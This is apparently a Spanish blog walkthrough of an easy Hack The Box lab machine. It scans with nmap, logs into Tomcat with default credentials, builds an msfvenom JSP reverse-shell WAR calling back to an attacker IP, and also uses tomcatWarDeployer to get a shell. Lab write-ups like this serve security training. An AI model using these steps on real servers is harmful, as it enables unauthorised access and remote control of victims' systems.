Hoy os dejo la resolución de una de las máquinas de HTB de nivel fácil. Es cortita, así que si estás preparado, levanta tu Kali (Parrot, o la que uses) y vamos a ello.
Sigue leyendo para enterarte de todo.
Comenzamos revisando todos los puertos con nmap:
nmap -p- -sS --min-rate 5000 -n -vvv -Pn 10.10.10.95 -oG allPorts
Y ahora lanzamos otro para ver los servicios:
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
Como no hay más que un puerto, veamos ese TomCat:
Comprobamos que si está visible el panel de login:
Lo primero es probar las credenciales por defecto:
tomcat : s3cret
Ya estamos dentro, ha sido fácil. Vamos a intentar subir una webshell, y para ello, lo hacemos así:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.10.14.43 LPORT= 443 -f war > shell.war
Una vez creada, la subimos a la web y nos ponemos a la escucha con netcat por el puerto que hemos establecido (443):
Nos crea “un apartado nuevo” y le damos para que se establezca la conexión:
Una vez que hemos accedido a la máqina, entramos y sacamos a la vez las flags de root y del usuario:
La verdad que esta máquina es muy muy sencilla, pero hay que hacerla. No nos volvamos locos con las más difíciles si no somos capaces de hacer estas primero.
Un extra:
Descargamos: https://github.com/mgeeky/tomcatWarDeployer
Lo clonamos, entramos en el directorio e instalamos los requisitos:
pip install -r requirements.txt
Y lo lanzamos:
python tomcatWarDeployer.py -U tomcat -P s3cret -p 4646 -H 10.10.14.43 10.10.10.95:8080 -x
Directamente nos devuelve una shell y ya podríamos sacar de la misma forma las flgs.
Nos vemos en la siguiente.
0 comentarios:
Publicar un comentario